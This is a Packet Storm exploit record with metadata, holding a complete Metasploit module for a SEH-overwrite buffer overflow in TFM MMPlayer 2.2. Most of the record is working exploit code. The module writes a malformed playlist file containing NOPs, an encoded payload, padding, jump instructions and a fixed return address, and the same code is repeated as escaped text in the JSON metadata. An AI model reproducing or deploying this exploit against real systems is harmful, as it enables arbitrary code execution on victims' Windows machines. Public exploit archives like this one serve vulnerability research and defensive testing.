ID PACKETSTORM:113764
Type packetstorm
Reporter RjRjh Hack3r
Modified 2012-06-16T00:00:00
Description
`##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'TFM MMPlayer (m3u/ppl File) Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in MMPlayer 2.2
The vulnerability is triggered when opening a malformed M3U/PPL file
that contains an overly long string, which results in overwriting a
SEH record, thus allowing arbitrary code execution under the context
of the user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'RjRjh Hack3r', # Original discovery and exploit
'Brendan Coles <bcoles[at]gmail.com>' # msf exploit
],
'References' =>
[
[ 'OSVDB', '80532' ],
[ 'BID', '52698' ],
[ 'EDB', '18656' ], # .m3u
[ 'EDB', '18657' ] # .ppl
],
'DefaultOptions' =>
{
'ExitFunction' => 'seh',
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'Targets' =>
[
# Tested on:
# Windows XP Pro SP3 - English
# Windows Vista SP1 - English
# Windows 7 Home Basic SP0 - English
# Windows 7 Ultimate SP1 - English
# Windows Server 2003 Enterprise SP2 - English
[ 'Windows Universal', { 'Ret' => 0x00401390 } ], # p/p/r -> MMPlayer.exe
],
'Payload' =>
{
'Size' => 4000,
'BadChars' => "\x00\x0a\x0d",
'DisableNops' => false
},
'Privileged' => false,
'DisclosureDate' => 'Mar 23 2012',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.ppl'])
], self.class)
end
def exploit
nops = make_nops(10)
sc = payload.encoded
offset = Rex::Text.rand_text_alphanumeric(4103 - sc.length - nops.length)
jmp = Rex::Arch::X86.jmp(-4108) # near jump 4103 bytes
nseh = Rex::Arch::X86.jmp_short(-7) # jmp back 7 bytes
nseh << Rex::Text.rand_text_alphanumeric(2)
seh = [target.ret].pack('V')
sploit = nops
sploit << sc
sploit << offset
sploit << jmp
sploit << nseh
sploit << seh
# write file
file_create(sploit)
end
end
`
{"hash": "f7baa6a821eab2743cd7ed7d50d1764d5efef5094b1c564d62fc9720c6b95ff2", "sourceHref": "https://packetstormsecurity.com/files/download/113764/tfm_mmplayer_m3u_ppl_bof.rb.txt", "title": "TFM MMPlayer (m3u/ppl File) Buffer Overflow", "id": "PACKETSTORM:113764", "published": "2012-06-16T00:00:00", "description": "", "modified": "2012-06-16T00:00:00", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'TFM MMPlayer (m3u/ppl File) Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in MMPlayer 2.2 \nThe vulnerability is triggered when opening a malformed M3U/PPL file \nthat contains an overly long string, which results in overwriting a \nSEH record, thus allowing arbitrary code execution under the context \nof the user. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'RjRjh Hack3r', # Original discovery and exploit \n'Brendan Coles <bcoles[at]gmail.com>' # msf exploit \n], \n'References' => \n[ \n[ 'OSVDB', '80532' ], \n[ 'BID', '52698' ], \n[ 'EDB', '18656' ], # .m3u \n[ 'EDB', '18657' ] # .ppl \n], \n'DefaultOptions' => \n{ \n'ExitFunction' => 'seh', \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# Tested on: \n# Windows XP Pro SP3 - English \n# Windows Vista SP1 - English \n# Windows 7 Home Basic SP0 - English \n# Windows 7 Ultimate SP1 - English \n# Windows Server 2003 Enterprise SP2 - English \n[ 'Windows Universal', { 'Ret' => 0x00401390 } ], # p/p/r -> MMPlayer.exe \n], \n'Payload' => \n{ \n'Size' => 4000, \n'BadChars' => \"\\x00\\x0a\\x0d\", \n'DisableNops' => false \n}, \n'Privileged' => false, \n'DisclosureDate' => 'Mar 23 2012', \n'DefaultTarget' => 0 \n)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.ppl']) \n], self.class) \n \nend \n \ndef exploit \n \nnops = make_nops(10) \nsc = payload.encoded \noffset = Rex::Text.rand_text_alphanumeric(4103 - sc.length - nops.length) \njmp = Rex::Arch::X86.jmp(-4108) # near jump 4103 bytes \nnseh = Rex::Arch::X86.jmp_short(-7) # jmp back 7 bytes \nnseh << Rex::Text.rand_text_alphanumeric(2) \nseh = [target.ret].pack('V') \n \nsploit = nops \nsploit << sc \nsploit << offset \nsploit << jmp \nsploit << nseh \nsploit << seh \n \n# write file \nfile_create(sploit) \n \nend \nend \n \n`\n", "reporter": "RjRjh Hack3r", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "d443c46cc5648daa967ca889cc77279e"}, {"key": "modified", "hash": "07f24ccbbaa87722e9a75dfc7bd3e0e3"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "07f24ccbbaa87722e9a75dfc7bd3e0e3"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "dc9bcc7a5d0595d6398f8f2303a1ce57"}, {"key": "sourceData", "hash": "e99ec0752153c780f2620723a31073ff"}, {"key": "sourceHref", "hash": "5605952b5ceebabca6d629e0ea61c214"}, {"key": "title", "hash": "20b983231530b2c3ae12cbc8d9ec3946"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/113764/TFM-MMPlayer-m3u-ppl-File-Buffer-Overflow.html", "lastseen": "2016-11-03T10:18:47", "viewCount": 0, "enchantments": {"vulnersScore": 4.0}}
{"result": {}}